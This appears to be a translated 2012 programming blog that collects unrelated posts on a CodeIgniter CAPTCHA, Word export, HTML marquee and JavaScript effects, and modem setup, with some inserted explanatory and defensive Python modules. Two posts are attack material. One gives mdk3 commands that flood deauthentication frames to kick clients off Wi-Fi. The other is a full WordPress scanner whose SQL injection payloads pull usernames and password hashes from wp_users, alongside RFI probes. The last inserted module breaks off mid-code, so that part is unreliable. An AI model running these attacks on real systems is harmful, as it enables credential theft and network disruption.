Saturday, 30 June 2012

Creating CAPTCHA source code with PHP


After the previous tutorial, here I will briefly show a few ways to build a "Captcha" in this short post, namely how to create a Captcha in CodeIgniter 2.0.x. Many of you probably already know that since CodeIgniter released version 2.0.x there are no plugins any more, so the captcha that used to live in a plugin is now a helper.
First, to create a simple captcha in CodeIgniter, we can use the code below:

[php]
<?php
function captcha(){
    // the CAPTCHA helper (a plugin in CodeIgniter 1.x, a helper since 2.0)
    $this->load->helper('captcha');
    $vals = array(
        'word'       => 'Random word',   // text drawn on the image
        'img_path'   => 'captcha/',      // folder the PNG is written to (relative to index.php, must be writable)
        'img_url'    => 'http://localhost/belajar/codeigniter/captcha/', // public URL of that folder
        'img_width'  => 150,
        'img_height' => 30,
        'expiration' => 7200             // seconds before old images are deleted
    );
    $cap = create_captcha($vals);
    echo $cap['image'];
}
[/php]
In the code above, 'word' => 'Random word' means the captcha will draw the text "Random word". 'img_path' is the folder where the captcha images are saved on the host. 'img_url' is the URL of that image folder, which is what the browser loads to display the captcha image. For example, here I installed CodeIgniter in the folder 'belajar/codeigniter' and created a folder named captcha there as the place to save the captcha images, so img_url looks like the one in the code above. The rest of the code probably needs no explanation.
After $vals, which holds the array above, $cap = create_captcha($vals) does the actual captcha generation. Finally, to display the captcha image, just echo $cap['image'].
The result will look roughly like this:
[image: Creating a Captcha in CodeIgniter]
Wait, the text really says "Random word"? Heh, that is because we have not written the captcha generator yet. Now let's add a bit of code.
[php]
<?php
..
function captcha(){
    $this->load->helper('captcha');
    // alphabet of upper case, lower case and digits (I and i are left out: they look like 1 and l)
    $str = 'ABCDEFGHJKLMNOPQRSTUVWXYZ1234567890abcdefghjklmnopqrstuvwxyz';
    // shuffle the alphabet and keep the first 4 characters.
    // NOTE: str_shuffle() is not cryptographically secure and never repeats a
    // character; if the captcha matters, pick each character with random_int().
    $random_word = str_shuffle($str);
    $random_word = substr($random_word, 0, 4);
    $vals = array(
        'word'       => $random_word,
        'img_path'   => 'captcha/',
        'img_url'    => 'http://localhost/belajar/codeigniter/captcha/',
        'img_width'  => 150,
        'img_height' => 30,
        'expiration' => 7200
    );
    $cap = create_captcha($vals);
    // $cap['word'] holds the answer: keep it server-side (e.g. in the session)
    // and compare it with the user's input when the form is submitted.
    echo $cap['image'];
}
[/php]
This generator produces uppercase letters, lowercase letters and digits, and the captcha is 4 characters long. Now refresh or reload the page that contains the captcha. Two things to keep in mind: str_shuffle() is not a cryptographically secure source of randomness (use random_int() to pick each character if it matters), and drawing the image is only half the job. The word must be kept server-side (create_captcha() returns it in $cap['word']) and compared with what the user typed when the form is submitted; otherwise the captcha stops nothing.
Hope this is useful.
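The part the CodeIgniter helper does not do for you is what makes a captcha effective: drawing the word from a CSPRNG, keeping the answer on the server, and checking it exactly once. The Python module below is an added example of that server-side logic; it is not CodeIgniter code and not from the original post. `CaptchaStore` and its in-memory dictionary are hypothetical stand-ins for the session; the alphabet and the 7200-second lifetime are copied from the post.

```python
"""Issue-and-verify logic for a CAPTCHA (added example; not CodeIgniter code)."""
import hmac
import secrets
import time

# Alphabet from the post (no I or i); lifetime from the post's 'expiration'.
ALPHABET = "ABCDEFGHJKLMNOPQRSTUVWXYZ1234567890abcdefghjklmnopqrstuvwxyz"
TTL_SECONDS = 7200


def random_word(length=4, alphabet=ALPHABET):
    """Draw each character independently from the OS CSPRNG.

    The post's str_shuffle()+substr() uses PHP's non-cryptographic generator
    and draws without replacement; secrets.choice() has neither weakness.
    """
    return "".join(secrets.choice(alphabet) for _ in range(length))


class CaptchaStore:
    """Hypothetical server-side store: challenge id -> (answer, issued_at).

    In a real application this lives in the session or a cache; a dict is
    used here so the example runs stand-alone. `clock` is injectable so
    expiry can be tested without waiting.
    """

    def __init__(self, ttl=TTL_SECONDS, clock=time.time):
        self._ttl = ttl
        self._clock = clock
        self._pending = {}

    def issue(self, length=4):
        """Create a challenge. Returns (challenge_id, word).

        The id goes into the form (hidden field or session key); the word is
        what you would hand to create_captcha() to draw. The client never
        receives the word as text.
        """
        cid = secrets.token_urlsafe(16)
        word = random_word(length)
        self._pending[cid] = (word, self._clock())
        return cid, word

    def verify(self, cid, answer):
        """True only for an existing, unexpired, unused challenge whose
        answer matches (case-insensitively)."""
        entry = self._pending.pop(cid, None)  # single use, right or wrong
        if entry is None:
            return False
        word, issued = entry
        if self._clock() - issued > self._ttl:
            return False
        # Constant-time comparison so response time does not leak how many
        # leading characters were correct.
        return hmac.compare_digest(word.lower().encode(),
                                   str(answer).lower().encode())

    def pending(self):
        """Number of challenges still waiting for an answer."""
        return len(self._pending)
```

In the CodeIgniter flow, the `word` returned by `issue()` is what goes into `$vals['word']`, the challenge id goes into a hidden form field, and the form handler calls `verify()` with that id and the user's input; a refresh that issues a new image also invalidates the old answer.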

PHP source code to export to Word


<?php
$content = "This is test page";

// Size - sets the paper size: 8.5in 11.0in is US Letter; use 8.5in 14.0in for Legal and 8.27in 11.69in for A4
// Margin - sets the margins of the Word document - margin:0.5in 0.31in 0.42in 0.25in; [margin: top right bottom left]

$word_xmlns = "xmlns:o='urn:schemas-microsoft-com:office:office' xmlns:w='urn:schemas-microsoft-com:office:word' xmlns='http://www.w3.org/TR/REC-html40'";
$word_xml_settings = "<xml><w:WordDocument><w:View>Print</w:View><w:Zoom>100</w:Zoom></w:WordDocument></xml>";
$word_landscape_style = "@page {size:8.5in 11.0in; margin:0.5in 0.31in 0.42in 0.25in;} div.Section1{page:Section1;}";
$word_landscape_div_start = "<div class='Section1'>";
$word_landscape_div_end = "</div>";

// Word opens this HTML (with the Office namespaces above) as a .doc file.
// $content is inserted raw: if the body ever comes from user input, escape it
// with htmlspecialchars() first, and never put unfiltered input into the
// filename used in the Content-Disposition header below.
$content = '
<html '.$word_xmlns.'>
<head>'.$word_xml_settings.'<style type="text/css">
'.$word_landscape_style.' table,td {border:0px solid #FFFFFF;} </style>
</head>
<body>'.$word_landscape_div_start.$content.$word_landscape_div_end.'</body>
</html>
';

// @ silences "headers already sent" warnings; nothing may be output before these calls
@header('Content-Type: application/msword');
@header('Content-Length: '.strlen($content));
@header('Content-disposition: inline; filename="testdocument.doc"');
echo $content;

?>

How to make scrolling text (marquee effect)


Scrolling text, often called the marquee effect, is an HTML feature for making text move either horizontally or vertically. The marquee effect is popular with bloggers because, besides making a blog look nicer, it also catches visitors' attention. Bloggers usually use scrolling text to show a message, a link or a banner. Note that <marquee> is a non-standard element that browsers keep only for backwards compatibility; it is deprecated in HTML5. Examples of the marquee effect and how to make them are shown below:

  1. Basic marquee. The HTML code is:

    <marquee>Your text</marquee>

    The result looks like this:

    Your text

  2. Marquee that moves from left to right. The HTML code is:

    <marquee direction="right">Your text</marquee>

    The result looks like this:

    Your text

  3. Marquee that bounces back and forth between left and right. The HTML code is:

    <marquee behavior="alternate">Your text</marquee>

    The result looks like this:

    Your text

  4. Marquee from right to left that stops while the mouse is over the text. The HTML code is:

    <marquee onmouseover="this.stop()" onmouseout="this.start()">Your text</marquee>

    The result looks like this:

    Stops while the mouse is over your text

  5. Marquee that bounces left and right, with a speed you can set yourself. The HTML code is:

    <marquee behavior="alternate" scrollamount="18">Your text</marquee>

    The result looks like this:

    Your text

  6. Marquee that moves from bottom to top. The HTML code is:

    <marquee direction="up">Your text</marquee>

    The result looks like this:

    Your text

  7. Marquee with a bounding box, which stops while the mouse is over it. The HTML code is:

    <marquee direction="up" onmouseover="this.stop()" width="200" scrollamount="3" onmouseout="this.start()" height="100">Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>
    </marquee>

    The result looks like this:

    Your text
    Your text
    Your text
    Your text
    Your text
    Your text

  8. Marquee that moves downward, without the mouseover code. The HTML code is:

    <marquee direction="down" width="200" scrollamount="4" height="100">Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>
    </marquee>

    The result looks like this:

    Your text
    Your text
    Your text
    Your text
    Your text
    Your text

  9. Finally, a marquee wrapped in "center" so the text sits in the middle of the page. The HTML code is:

    <center>
    <marquee direction="up" onmouseover="this.stop()" width="200" scrollamount="1" onmouseout="this.start()" height="100">Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>Your text<br>
    </marquee>
    </center>

    The result looks like this:

    Your text
    Your text
    Your text
    Your text
    Your text
    Your text

Those are a few examples of the marquee effect, or scrolling text. From the examples above I think you already understand the HTML for the marquee effect, so feel free to get creative with it as you like.

HAVE FUN TRYING, AND THANK YOU

How to knock clients off a Wi-Fi network with BackTrack 5

Follow the steps below, typing each command in a terminal:
1. airmon-ng start wlan0   (puts the wireless card into monitor mode and creates the mon0 interface)
2. airodump-ng mon0 -t opn   (lists the networks in range; -t opn shows only open, unencrypted networks. Note the channel of the target.)
3. mdk3 mon0 d -c 1   (d is mdk3's deauthentication/disassociation "amok" mode; 1 is the channel number of the target Wi-Fi/hotspot)

mdk3's d mode sends spoofed deauthentication frames to every client it sees on that channel, so every station is kicked off the network and cannot reconnect until you stop it. Only run this against networks you own or are explicitly authorised to test. Access points and clients with 802.11w (protected management frames) enabled discard unauthenticated deauthentication frames, which is the defence against this attack.

HAVE FUN TRYING ...!
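What the defender sees is the other side of step 3: a burst of deauthentication frames, all claiming to come from the access point, far beyond the handful a real AP sends. The Python script below is an added example (not from the original post, and not part of mdk3 or aircrack-ng) of detecting that flood from raw 802.11 management frames as a monitor-mode capture would deliver them. The sample frames are constructed inline; the MAC addresses, the 20-frames-per-second threshold and the function names are the example's own assumptions.

```python
"""Detect a deauth/disassoc flood in raw 802.11 frames (added example)."""
import struct
from collections import defaultdict

# Management-frame subtypes (frame type 0)
BEACON, DISASSOC, DEAUTH = 8, 10, 12


def mac(b):
    """Render 6 raw bytes as a colon-separated MAC string."""
    return ":".join("%02x" % x for x in b)


def parse_frame(raw):
    """Return (type, subtype, addr1, addr2, addr3, reason) or None if too short.

    Frame Control is the first two bytes: bits 2-3 of byte 0 are the frame
    type, bits 4-7 the subtype. Management frames carry a 24-byte header
    (FC, duration, addr1, addr2, addr3, sequence control); deauth and
    disassoc frames follow it with a 2-byte little-endian reason code.
    """
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    addr1, addr2, addr3 = raw[4:10], raw[10:16], raw[16:22]
    reason = None
    if ftype == 0 and subtype in (DEAUTH, DISASSOC) and len(raw) >= 26:
        reason = struct.unpack_from("<H", raw, 24)[0]
    return ftype, subtype, mac(addr1), mac(addr2), mac(addr3), reason


def detect_deauth_flood(frames, window=1.0, threshold=20):
    """Return [(bssid, window_start, count)] for every time window in which
    more than `threshold` deauth/disassoc frames name the same BSSID.

    A real AP emits a few of these per day, not dozens per second; the
    threshold is the example's own choice and should be tuned per site.
    """
    buckets = defaultdict(int)
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        ftype, subtype, _addr1, _addr2, bssid, _reason = parsed
        if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
            continue
        buckets[(bssid, int(ts // window))] += 1   # addr3 is the BSSID on mgmt frames
    return [(bssid, w * window, n)
            for (bssid, w), n in sorted(buckets.items(), key=lambda kv: kv[0][1])
            if n > threshold]


def build_mgmt(subtype, dst, src, bssid, reason=None):
    """Construct a minimal management frame (used only for the sample data)."""
    fc = bytes([(subtype << 4) | 0x00, 0x00])          # type 0 = management, no flags
    frame = fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


def sample_capture():
    """Constructed capture (hypothetical MACs): five beacons, one legitimate
    deauth to a single client, then 50 broadcast deauths spoofed from the AP
    within half a second, which is the pattern an mdk3 d flood produces."""
    ap = bytes.fromhex("00112233aabb")
    client = bytes.fromhex("66778899ccdd")
    bcast = b"\xff" * 6
    frames = [(i * 0.1, build_mgmt(BEACON, bcast, ap, ap)) for i in range(5)]
    frames.append((0.5, build_mgmt(DEAUTH, client, ap, ap, reason=3)))
    frames += [(2.0 + i * 0.01, build_mgmt(DEAUTH, bcast, ap, ap, reason=7))
               for i in range(50)]
    return frames


if __name__ == "__main__":
    for bssid, start, count in detect_deauth_flood(sample_capture()):
        print("deauth flood: bssid=%s t=%.1fs frames=%d" % (bssid, start, count))
```

Feeding real traffic in is a matter of reading frames (for example via a pcap library) into the same `(timestamp, bytes)` pairs; radiotap headers must be stripped first, since `parse_frame` expects the 802.11 header at offset 0.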

Setting up a dial-up modem on BackTrack

After a week of my BackTrack sitting idle without a connection, I finally got it online. Straight to the point, ladies and gentlemen:
-download wvdial (search Google, there are plenty of sources)
-move it to the root folder, then open a terminal and install it by typing dpkg -i wvdial.deb
-find the vendor ID and product ID of your modem by typing lsusb in the terminal. It usually shows something like this:
Bus 002 Device 012: ID 0eab:511f
Bus 002 Device 003: ID 1c4f:0003 SiGma Micro HID controller
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
0eab:511f <-- this is my ID (I am using a Speed Up CDMA SU6380)
-type echo "usbserial vendor=0x0eab product=0x511f" | sudo tee -a /etc/modules > /dev/null
(this appends a usbserial line to /etc/modules so the modem is bound as a /dev/ttyUSB* serial port at boot; substitute your own vendor and product IDs)

-check whether your modem is detected by typing wvdialconf in the terminal
-then edit wvdial.conf: type gedit /etc/wvdial.conf
-enter the configuration below

[Dialer saya]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Stupid Mode = 1
Modem Type = Analog Modem
Command Line = ATDT
ISDN = 0
New PPPD = yes
Phone = #777
Modem = /dev/ttyUSB0
Username = xxxxx@free
Password = xxxxx
Baud = 460800

(replace the username and password with your own ISP username and password; the file holds them in plaintext, so keep /etc/wvdial.conf readable by root only, e.g. chmod 600 /etc/wvdial.conf)

-save, then connect with the command "wvdial saya" in the terminal (without the quotes)
-please try it; if there is anything to add, please correct me. Thanks

Source code to play sound on a website

<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"> 
<param value="#ffffff" name="bgcolor">
<param value="mp3=http://dc237.4shared.com/img/821760498/c13a507e/dlink__2Fdownload_2FWfwEa6hu_3Ftsid_3D20111003-075008-775053e9/preview.mp3&loop=1&autoplay=1&volume=150" name="FlashVars"> 
</object>



Explanation:
"http://dc237.4shared.com/img/821760498/c13a507e/dlink__2Fdownload_2FWfwEa6hu_3Ftsid_3D20111003-075008-775053e9/preview.mp3" is where you put the link to the sound file; it can be mp3, wav, etc. You can find one via Google. Bear in mind that the player itself (player_mp3.swf) is loaded from a third-party site you do not control, and that current browsers no longer run Flash Player, so this snippet plays nothing on them; the HTML5 <audio> element does the same job without a plugin.

Source code for rotating text with JavaScript

<style type="text/css">
/* Circle Text Styles */
#outerCircleText {
/* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
font-style: italic;
font-weight: bold;
font-family: 'comic sans ms', verdana, arial;
color:ORANGE ;
/* End Optional */

/* Start Required - Do Not Edit */
position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
#outerCircleText div {position: relative;}
#outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
/* End Required */
/* End Circle Text Styles */
</style>
<script type="text/javascript">


;(function(){

// Your message here (QUOTED STRING)
var msg = "! sniper!";

/* THE REST OF THE EDITABLE VALUES BELOW ARE ALL UNQUOTED NUMBERS */

// Set font's style size for calculating dimensions
// Set to number of desired pixels font size (decimal and negative numbers not allowed)
var size = 24;

// Set both to 1 for plain circle, set one of them to 2 for oval
// Other numbers & decimals can have interesting effects, keep these low (0 to 3)
var circleY = 0.75; var circleX = 2;

// The larger this divisor, the smaller the spaces between letters
// (decimals allowed, not negative numbers)
var letter_spacing = 5;

// The larger this multiplier, the bigger the circle/oval
// (decimals allowed, not negative numbers, some rounding is applied)
var diameter = 10;

// Rotation speed, set it negative if you want it to spin clockwise (decimals allowed)
var rotation = 0.4;

// This is not the rotation speed, its the reaction speed, keep low!
// Set this to 1 or a decimal less than one (decimals allowed, not negative numbers)
var speed = 0.3;

////////////////////// Stop Editing //////////////////////

if (!window.addEventListener && !window.attachEvent || !document.createElement) return;

msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
o = document.createElement('div'), oi = document.createElement('div'),
b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,

mouse = function(e){
e = e || window.event;
ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
},

makecircle = function(){ // rotation/positioning
if(init.nopy){
o.style.top = (b || document.body).scrollTop + 'px';
o.style.left = (b || document.body).scrollLeft + 'px';
};
currStep -= rotation;
for (var d, i = n; i > -1; --i){ // makes the circle
d = document.getElementById('iemsg' + i).style;
d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
};
},

drag = function(){ // makes the resistance
y[0] = Y[0] += (ymouse - Y[0]) * speed;
x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
for (var i = n; i > 0; --i){
y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
x[i] = X[i] += (x[i-1] - X[i]) * speed;
};
makecircle();
},

init = function(){ // appends message divs, & sets initial values for positioning arrays
if(!isNaN(window.pageYOffset)){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
} else init.nopy = true;
for (var d, i = n; i > -1; --i){
d = document.createElement('div'); d.id = 'iemsg' + i;
d.style.height = d.style.width = a + 'px';
d.appendChild(document.createTextNode(msg[i]));
oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
};
o.appendChild(oi); document.body.appendChild(o);
setInterval(drag, 25);
},

ascroll = function(){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
window.removeEventListener('scroll', ascroll, false);
};

o.id = 'outerCircleText'; o.style.fontSize = size + 'px';

if (window.addEventListener){
window.addEventListener('load', init, false);
document.addEventListener('mouseover', mouse, false);
document.addEventListener('mousemove', mouse, false);
if (/Apple/.test(navigator.vendor))
window.addEventListener('scroll', ascroll, false);
}
else if (window.attachEvent){
window.attachEvent('onload', init);
document.attachEvent('onmousemove', mouse);
};

})();

</script>


NB:
Insert the code above between <head> ... </head> on your page.

Example source code to display a clock on a website

<html>
<head>
<title>jam</title>
<script type="text/javascript">
function tampilkanjam() {
var waktu= new Date();
var jam= waktu.getHours();
var menit= waktu.getMinutes();
menit= ((menit < 10) ? "0" : "") + menit;   // zero-pad minutes
var detik= waktu.getSeconds();
detik= ((detik < 10) ? "0" : "") + detik;   // zero-pad seconds
var jamSekarang= jam + ":" + menit + ":" + detik;
document.getElementById("jam").innerHTML= jamSekarang;
// pass the function itself, not a string: a string argument is eval'd
window.setTimeout(tampilkanjam, 1000);
}
</script>
</head>

<body onload="tampilkanjam()">
jam Sekarang: <span id="jam"></span>
</body>
</html>

Sunday, 10 June 2012

WordPress SQL/RFI/CGI scanner


#!/usr/bin/python
#WordPress SQL/RFI/CGI scanner. SQL will check
#for md5's in the source and RFI/CGI will use
#http responses.
#
# Python 2 script (urllib2/httplib). Usage: ./wpscan.py www.site.com/wp-content/


import sys, urllib2, re, time, httplib

#Bad HTTP Responses
BAD_RESP = [400,401,404]

def main(path):
    """HEAD request for host+path; returns (status, reason, Server header),
    or (None, None, None) when the connection fails."""
    print "[+] Testing:",host.split("/",1)[1]+path
    try:
        h = httplib.HTTP(host.split("/",1)[0])
        h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
        h.putheader("Host", host.split("/",1)[0])
        h.endheaders()
        resp, reason, headers = h.getreply()
        return resp, reason, headers.get("Server")
    except Exception, msg:
        print "Error Occurred:",msg
        return None, None, None

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

print "\n\t  visit me www[dot]flazer-404[dot]com"
print "\t------------------------------------------"

# UNION-based SQL injection payloads against old WordPress cores/plugins; each
# one tries to pull user_login/user_pass out of wp_users.
sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
    "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
    "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
    "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
    "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
    "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
    "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
    "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
    "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
    "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
    "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
    "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain"]

# Remote file inclusion: file to probe -> URL pattern where "shell" stands
# for the attacker-supplied include URL.
rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
    "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell",
    "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell",
    "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell",
    "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell",
    "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell",
    "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"}

# Files with published exploits: path to probe -> advisory/exploit reference.
cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
    "wp-admin/users.php":"http://milw0rm.com/exploits/1059",
    "xmlrpc.php":"http://milw0rm.com/exploits/1077",
    "wp-includes/cache.php":"http://milw0rm.com/exploits/6",
    "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814",
    "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960",
    "wp-app.php":"http://milw0rm.com/exploits/4113",
    "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695",
    "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844",
    "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013",
    "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035",
    "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"}

if len(sys.argv) != 2:
    print "\nUsage: ./wpscan.py <site+dir>"
    print "Ex: ./wpscan.py www.site.com/wp-content/\n"
    sys.exit(1)

# host is "site/dir/" with exactly one trailing slash; main() splits it on the
# first "/" into the hostname and the base path
host = sys.argv[1].replace("http://","").rstrip("/") + "/"
   
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] RFI Loaded:",len(rfis)
print "[+] CGI Loaded:",len(cgis)

server = main("/")[2]
print "[+] Server:",server

print "\n[+] Started:",timer()

print "\n[+] Scanning: SQL\n"
for sql in sqls:
    time.sleep(2) #Change this if needed
    print "[+] Trying:",sql.replace("\n","")
    try:
        source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
        # any 32-hex-digit string in the response is reported as a leaked MD5;
        # WordPress 2.5+ stores phpass hashes ($P$...), so this only catches
        # old installs
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n\t[+]MD5:",md5
    except (urllib2.HTTPError, urllib2.URLError):
        pass
print "\n[+] Scanning: RFI\n"
for rfi, shell in rfis.items():
    resp,reason,server = main(rfi)
    if resp is None:
        continue
    if resp not in BAD_RESP:
        print "\t[+] Got:",resp, reason
        print "\t[+] Try:",host+shell
    else:
        print "\t[-] Got:",resp, reason
print "\n[+] Scanning: CGI\n"
for cgi, expl in cgis.items():
    resp,reason,server = main(cgi)
    if resp is None:
        continue
    if resp not in BAD_RESP:
        print "\t[+] Got:",resp, reason
        print "\t[+] Check:",expl
    else:
        print "\t[-] Got:",resp, reason
print "\n[-] Done\n"
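Everything the scanner above does leaves a trace in the target's access log: UNION SELECT probes against wp_users, double-encoded quotes, and plugin paths hit with a URL in a path parameter. The Python module below is an added example, not from the original script and not from any product, of flagging those probes in an Apache combined-format log. The log lines are constructed here from the scanner's own payloads using documentation IP addresses; the rule names, the normalization steps and the two-hit threshold are the example's own choices.

```python
"""Flag WordPress SQLi/RFI probes in an access log (added example)."""
import re
import urllib.parse
from collections import defaultdict

# Apache combined log: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def normalize(path):
    """Undo what the payloads rely on: repeated percent-decoding (the scanner
    sends %2527 for a single quote), /**/ comments used as whitespace, and
    case."""
    prev = None
    while prev != path:                       # decode until stable
        prev, path = path, urllib.parse.unquote_plus(path)
    return re.sub(r"/\*.*?\*/", " ", path).lower()


# Rule names are the example's own. The rfi rule mirrors the parameter names
# the scanner targets (wpPATH, myPath, boarddir, libpath, bkpwp_plugin_path).
RULES = [
    ("sqli-union", re.compile(r"\bunion\b[\s(]+(?:all\s+)?select\b")),
    ("wp-users-dump", re.compile(r"\b(?:user_pass|user_login)\b.*\bwp_users\b")),
    ("rfi", re.compile(r"[?&][a-z_]*(?:path|dir)=(?:https?|ftp)://")),
]


def classify(line):
    """Return (ip, method, status, [matched rule names]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = normalize(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(path)]
    return m.group("ip"), m.group("method"), int(m.group("status")), hits


def scan_log(text, min_hits=2):
    """Aggregate per source IP. Returns {ip: sorted rule names} for sources
    with at least `min_hits` flagged requests: one hit may be a false
    positive, a series of them is a scan."""
    per_ip = defaultdict(list)
    for line in text.splitlines():
        parsed = classify(line)
        if parsed and parsed[3]:
            per_ip[parsed[0]].append(parsed[3])
    return {ip: sorted({name for hits in v for name in hits})
            for ip, v in per_ip.items() if len(v) >= min_hits}


# Constructed sample: three scanner payloads and a HEAD probe from 203.0.113.9,
# a real RFI attempt from 198.51.100.4, and two benign requests from 192.0.2.77
# (the last one contains the words "union" and "select" in a search string).
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jun/2012:20:15:01 +0700] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* HTTP/1.1" 200 5123
203.0.113.9 - - [10/Jun/2012:20:15:03 +0700] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/* HTTP/1.1" 500 0
203.0.113.9 - - [10/Jun/2012:20:15:05 +0700] "GET /wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* HTTP/1.1" 404 221
203.0.113.9 - - [10/Jun/2012:20:15:07 +0700] "HEAD /wp-content/plugins/BackUp/Archive.php HTTP/1.0" 404 0
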